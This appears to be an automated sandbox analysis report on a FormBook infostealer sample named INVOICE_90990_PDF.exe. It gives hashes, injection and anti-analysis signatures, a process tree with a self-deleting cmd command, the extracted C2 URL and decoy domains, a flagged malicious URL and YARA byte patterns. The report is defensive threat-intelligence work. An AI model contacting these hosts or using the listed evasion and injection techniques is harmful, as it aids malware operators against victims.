Play interactive tour

Edit tour

Windows Analysis Report INVOICE_90990_PDF.exe

Overview

General Information

Sample Name:	INVOICE_90990_PDF.exe
Analysis ID:	461656
MD5:	3e94bee073a286e8b446e87a126dde1e
SHA1:	bf461d7bc78fd36eb06ca49e4e02c3bc06897905
SHA256:	85951f6ce24ad0c5e5a73c26b48dca2c9e013b554639e46dbf02bffd56cf1891
Tags:	exeInvoice
Infos:
Most interesting Screenshot:

Detection

FormBook

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Detected unpacking (changes PE section rights)

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

System process connects to network (likely due to code injection or exploit)

Yara detected FormBook

C2 URLs / IPs found in malware configuration

Executable has a suspicious name (potential lure to open the executable)

Initial sample is a PE file and has a suspicious name

Machine Learning detection for sample

Maps a DLL or memory area into another process

Modifies the context of a thread in another process (thread injection)

Queues an APC in another process (thread injection)

Sample uses process hollowing technique

Tries to detect virtualization through RDTSC time measurements

Antivirus or Machine Learning detection for unpacked file

Checks if the current process is being debugged

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to query CPU information (cpuid)

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Enables debug privileges

Found inlined nop instructions (likely shell or obfuscated code)

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Process Tree

System is w10x64

INVOICE_90990_PDF.exe (PID: 5748 cmdline: 'C:\Users\user\Desktop\INVOICE_90990_PDF.exe' MD5: 3E94BEE073A286E8B446E87A126DDE1E)

INVOICE_90990_PDF.exe (PID: 6040 cmdline: 'C:\Users\user\Desktop\INVOICE_90990_PDF.exe' MD5: 3E94BEE073A286E8B446E87A126DDE1E)

explorer.exe (PID: 3472 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)

autoconv.exe (PID: 3900 cmdline: C:\Windows\SysWOW64\autoconv.exe MD5: 4506BE56787EDCD771A351C10B5AE3B7)

chkdsk.exe (PID: 5412 cmdline: C:\Windows\SysWOW64\chkdsk.exe MD5: 2D5A2497CB57C374B3AE3080FF9186FB)

cmd.exe (PID: 5924 cmdline: /c del 'C:\Users\user\Desktop\INVOICE_90990_PDF.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 5380 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.microprojects.net/usvr/"], "decoy": ["theblockmeatstore.com", "drone-moment.com", "srsfashionbd.com", "kylayagerartwork.com", "instagrams.tools", "rosenwealth.com", "indicraftsvilla.com", "rswizard.com", "irist.one", "pubgclaimx14.com", "thegeorgiahomefinder.com", "unusualdog.com", "kifayatikart.com", "methodunit.net", "bavarian-luxury.com", "17391000.com", "ipcsaveday.com", "yael-b.com", "pasionqueconecta.com", "youngsvideography.com", "absorbscratch.icu", "nzrugbylife.info", "inabellesolutions.com", "applesoso.com", "soshop365.com", "viewmydiary.com", "onemillionrosary.com", "erotickykontakt.com", "xn--yfr994dchc.net", "quiltedpicturebooks.com", "monteiromarquesadv.com", "anugrahdayakencana.com", "jz-fh.com", "beijingjiadu.com", "qdwentang.com", "shandasden.com", "xn--bckb2ercf4fxgsa3e.xyz", "ecozoca.com", "spiritsvest.com", "pigsflycheap.com", "onenationunderbread.com", "bunganutlakecampingarea.com", "deltafinancialgroup.net", "glamsocialevents.com", "sportzdestinations.com", "memento-lagoon.com", "nuvo-condos.com", "urteiki.com", "negociosconjuanceri.com", "finescocms.com", "simposiocpa.com", "topelk.com", "duetoboias.com", "priormakers.net", "impossibilitee.com", "zombiguitar.com", "conseilaffaires.com", "ecrires.xyz", "magetu.info", "miracle-tone.com", "quranvisor.com", "thebabytemplate.com", "wcarrillo.com", "wallstmotorsports.com"]}

Yara Overview

Memory Dumps

Source	Rule	Description	Author	Strings
00000011.00000002.490998807.0000000000430000.00000004.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000011.00000002.490998807.0000000000430000.00000004.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x85f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19797:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1a83a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000011.00000002.490998807.0000000000430000.00000004.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x166c9:$sqlite3step: 68 34 1C 7B E1 0x167dc:$sqlite3step: 68 34 1C 7B E1 0x166f8:$sqlite3text: 68 38 2A 90 C5 0x1681d:$sqlite3text: 68 38 2A 90 C5 0x1670b:$sqlite3blob: 68 53 D8 7F 8C 0x16833:$sqlite3blob: 68 53 D8 7F 8C
00000002.00000001.231116908.0000000000400000.00000040.00020000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000002.00000001.231116908.0000000000400000.00000040.00020000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x85f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19797:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1a83a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000002.00000001.231116908.0000000000400000.00000040.00020000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x166c9:$sqlite3step: 68 34 1C 7B E1 0x167dc:$sqlite3step: 68 34 1C 7B E1 0x166f8:$sqlite3text: 68 38 2A 90 C5 0x1681d:$sqlite3text: 68 38 2A 90 C5 0x1670b:$sqlite3blob: 68 53 D8 7F 8C 0x16833:$sqlite3blob: 68 53 D8 7F 8C
00000011.00000002.492524141.0000000004CC0000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000011.00000002.492524141.0000000004CC0000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x85f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19797:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1a83a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000011.00000002.492524141.0000000004CC0000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x166c9:$sqlite3step: 68 34 1C 7B E1 0x167dc:$sqlite3step: 68 34 1C 7B E1 0x166f8:$sqlite3text: 68 38 2A 90 C5 0x1681d:$sqlite3text: 68 38 2A 90 C5 0x1670b:$sqlite3blob: 68 53 D8 7F 8C 0x16833:$sqlite3blob: 68 53 D8 7F 8C
00000000.00000002.234295512.0000000003970000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000000.00000002.234295512.0000000003970000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x85f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19797:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1a83a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000000.00000002.234295512.0000000003970000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x166c9:$sqlite3step: 68 34 1C 7B E1 0x167dc:$sqlite3step: 68 34 1C 7B E1 0x166f8:$sqlite3text: 68 38 2A 90 C5 0x1681d:$sqlite3text: 68 38 2A 90 C5 0x1670b:$sqlite3blob: 68 53 D8 7F 8C 0x16833:$sqlite3blob: 68 53 D8 7F 8C
00000005.00000000.278227524.0000000006D3C000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000005.00000000.278227524.0000000006D3C000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x56a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x5191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x57a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x591f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x440c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa797:$sequence_8: 3C 54 74 04 3C 74 75 F4 0xb83a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000005.00000000.278227524.0000000006D3C000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x76c9:$sqlite3step: 68 34 1C 7B E1 0x77dc:$sqlite3step: 68 34 1C 7B E1 0x76f8:$sqlite3text: 68 38 2A 90 C5 0x781d:$sqlite3text: 68 38 2A 90 C5 0x770b:$sqlite3blob: 68 53 D8 7F 8C 0x7833:$sqlite3blob: 68 53 D8 7F 8C
00000002.00000002.312959216.0000000000590000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000002.00000002.312959216.0000000000590000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x85f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19797:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1a83a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000002.00000002.312959216.0000000000590000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x166c9:$sqlite3step: 68 34 1C 7B E1 0x167dc:$sqlite3step: 68 34 1C 7B E1 0x166f8:$sqlite3text: 68 38 2A 90 C5 0x1681d:$sqlite3text: 68 38 2A 90 C5 0x1670b:$sqlite3blob: 68 53 D8 7F 8C 0x16833:$sqlite3blob: 68 53 D8 7F 8C
00000002.00000002.313017182.00000000005C0000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000002.00000002.313017182.00000000005C0000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x85f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19797:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1a83a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000002.00000002.313017182.00000000005C0000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x166c9:$sqlite3step: 68 34 1C 7B E1 0x167dc:$sqlite3step: 68 34 1C 7B E1 0x166f8:$sqlite3text: 68 38 2A 90 C5 0x1681d:$sqlite3text: 68 38 2A 90 C5 0x1670b:$sqlite3blob: 68 53 D8 7F 8C 0x16833:$sqlite3blob: 68 53 D8 7F 8C
00000002.00000002.312696667.0000000000400000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000002.00000002.312696667.0000000000400000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x85f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19797:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1a83a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000002.00000002.312696667.0000000000400000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x166c9:$sqlite3step: 68 34 1C 7B E1 0x167dc:$sqlite3step: 68 34 1C 7B E1 0x166f8:$sqlite3text: 68 38 2A 90 C5 0x1681d:$sqlite3text: 68 38 2A 90 C5 0x1670b:$sqlite3blob: 68 53 D8 7F 8C 0x16833:$sqlite3blob: 68 53 D8 7F 8C
Click to see the 19 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
0.2.INVOICE_90990_PDF.exe.3970000.2.raw.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0.2.INVOICE_90990_PDF.exe.3970000.2.raw.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x85f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19797:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1a83a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0.2.INVOICE_90990_PDF.exe.3970000.2.raw.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x166c9:$sqlite3step: 68 34 1C 7B E1 0x167dc:$sqlite3step: 68 34 1C 7B E1 0x166f8:$sqlite3text: 68 38 2A 90 C5 0x1681d:$sqlite3text: 68 38 2A 90 C5 0x1670b:$sqlite3blob: 68 53 D8 7F 8C 0x16833:$sqlite3blob: 68 53 D8 7F 8C
2.1.INVOICE_90990_PDF.exe.400000.0.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
2.1.INVOICE_90990_PDF.exe.400000.0.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x77f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x7b92:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x138a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x13391:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x139a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x13b1f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x85aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1260c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x9322:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x18997:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x19a3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
2.1.INVOICE_90990_PDF.exe.400000.0.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x158c9:$sqlite3step: 68 34 1C 7B E1 0x159dc:$sqlite3step: 68 34 1C 7B E1 0x158f8:$sqlite3text: 68 38 2A 90 C5 0x15a1d:$sqlite3text: 68 38 2A 90 C5 0x1590b:$sqlite3blob: 68 53 D8 7F 8C 0x15a33:$sqlite3blob: 68 53 D8 7F 8C
0.2.INVOICE_90990_PDF.exe.3970000.2.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0.2.INVOICE_90990_PDF.exe.3970000.2.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x77f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x7b92:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x138a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x13391:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x139a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x13b1f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x85aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1260c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x9322:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x18997:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x19a3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0.2.INVOICE_90990_PDF.exe.3970000.2.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x158c9:$sqlite3step: 68 34 1C 7B E1 0x159dc:$sqlite3step: 68 34 1C 7B E1 0x158f8:$sqlite3text: 68 38 2A 90 C5 0x15a1d:$sqlite3text: 68 38 2A 90 C5 0x1590b:$sqlite3blob: 68 53 D8 7F 8C 0x15a33:$sqlite3blob: 68 53 D8 7F 8C
2.1.INVOICE_90990_PDF.exe.400000.0.raw.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
2.1.INVOICE_90990_PDF.exe.400000.0.raw.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x85f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19797:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1a83a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
2.1.INVOICE_90990_PDF.exe.400000.0.raw.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x166c9:$sqlite3step: 68 34 1C 7B E1 0x167dc:$sqlite3step: 68 34 1C 7B E1 0x166f8:$sqlite3text: 68 38 2A 90 C5 0x1681d:$sqlite3text: 68 38 2A 90 C5 0x1670b:$sqlite3blob: 68 53 D8 7F 8C 0x16833:$sqlite3blob: 68 53 D8 7F 8C
2.2.INVOICE_90990_PDF.exe.400000.0.raw.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
2.2.INVOICE_90990_PDF.exe.400000.0.raw.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x85f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19797:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1a83a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
2.2.INVOICE_90990_PDF.exe.400000.0.raw.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x166c9:$sqlite3step: 68 34 1C 7B E1 0x167dc:$sqlite3step: 68 34 1C 7B E1 0x166f8:$sqlite3text: 68 38 2A 90 C5 0x1681d:$sqlite3text: 68 38 2A 90 C5 0x1670b:$sqlite3blob: 68 53 D8 7F 8C 0x16833:$sqlite3blob: 68 53 D8 7F 8C
2.2.INVOICE_90990_PDF.exe.400000.0.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
2.2.INVOICE_90990_PDF.exe.400000.0.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x77f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x7b92:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x138a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x13391:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x139a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x13b1f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x85aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1260c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x9322:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x18997:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x19a3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
2.2.INVOICE_90990_PDF.exe.400000.0.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x158c9:$sqlite3step: 68 34 1C 7B E1 0x159dc:$sqlite3step: 68 34 1C 7B E1 0x158f8:$sqlite3text: 68 38 2A 90 C5 0x15a1d:$sqlite3text: 68 38 2A 90 C5 0x1590b:$sqlite3blob: 68 53 D8 7F 8C 0x15a33:$sqlite3blob: 68 53 D8 7F 8C
Click to see the 13 entries

Sigma Overview

No Sigma rule has matched

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Antivirus detection for URL or domain

Show sources

Source: http://www.theblockmeatstore.com/usvr/?mN9d3vF=Hs/L2mJb/OvBe1dqvAkGsli1RxAdmzZKlJhWcEJnXFq+EPLVBdDFfDQ7MNGC2C8pb8qs&Pjf81=-Zdd-V5hqhM4p2S

Avira URL Cloud: Label: malware

Found malware configuration

Show sources

Source: 00000002.00000001.231116908.0000000000400000.00000040.00020000.sdmp

Malware Configuration Extractor: FormBook {"C2 list": ["www.microprojects.net/usvr/"], "decoy": ["theblockmeatstore.com", "drone-moment.com", "srsfashionbd.com", "kylayagerartwork.com", "instagrams.tools", "rosenwealth.com", "indicraftsvilla.com", "rswizard.com", "irist.one", "pubgclaimx14.com", "thegeorgiahomefinder.com", "unusualdog.com", "kifayatikart.com", "methodunit.net", "bavarian-luxury.com", "17391000.com", "ipcsaveday.com", "yael-b.com", "pasionqueconecta.com", "youngsvideography.com", "absorbscratch.icu", "nzrugbylife.info", "inabellesolutions.com", "applesoso.com", "soshop365.com", "viewmydiary.com", "onemillionrosary.com", "erotickykontakt.com", "xn--yfr994dchc.net", "quiltedpicturebooks.com", "monteiromarquesadv.com", "anugrahdayakencana.com", "jz-fh.com", "beijingjiadu.com", "qdwentang.com", "shandasden.com", "xn--bckb2ercf4fxgsa3e.xyz", "ecozoca.com", "spiritsvest.com", "pigsflycheap.com", "onenationunderbread.com", "bunganutlakecampingarea.com", "deltafinancialgroup.net", "glamsocialevents.com", "sportzdestinations.com", "memento-lagoon.com", "nuvo-condos.com", "urteiki.com", "negociosconjuanceri.com", "finescocms.com", "simposiocpa.com", "topelk.com", "duetoboias.com", "priormakers.net", "impossibilitee.com", "zombiguitar.com", "conseilaffaires.com", "ecrires.xyz", "magetu.info", "miracle-tone.com", "quranvisor.com", "thebabytemplate.com", "wcarrillo.com", "wallstmotorsports.com"]}

Multi AV Scanner detection for submitted file

Show sources

Source: INVOICE_90990_PDF.exe	Virustotal: Detection: 34%			Perma Link
Source: INVOICE_90990_PDF.exe	ReversingLabs: Detection: 32%

Yara detected FormBook

Show sources

Source: Yara match	File source: 0.2.INVOICE_90990_PDF.exe.3970000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.1.INVOICE_90990_PDF.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.INVOICE_90990_PDF.exe.3970000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.1.INVOICE_90990_PDF.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.INVOICE_90990_PDF.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.INVOICE_90990_PDF.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000011.00000002.490998807.0000000000430000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000001.231116908.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.492524141.0000000004CC0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.234295512.0000000003970000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000000.278227524.0000000006D3C000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.312959216.0000000000590000.00000040.00000001.sdmp, type: MEMORY
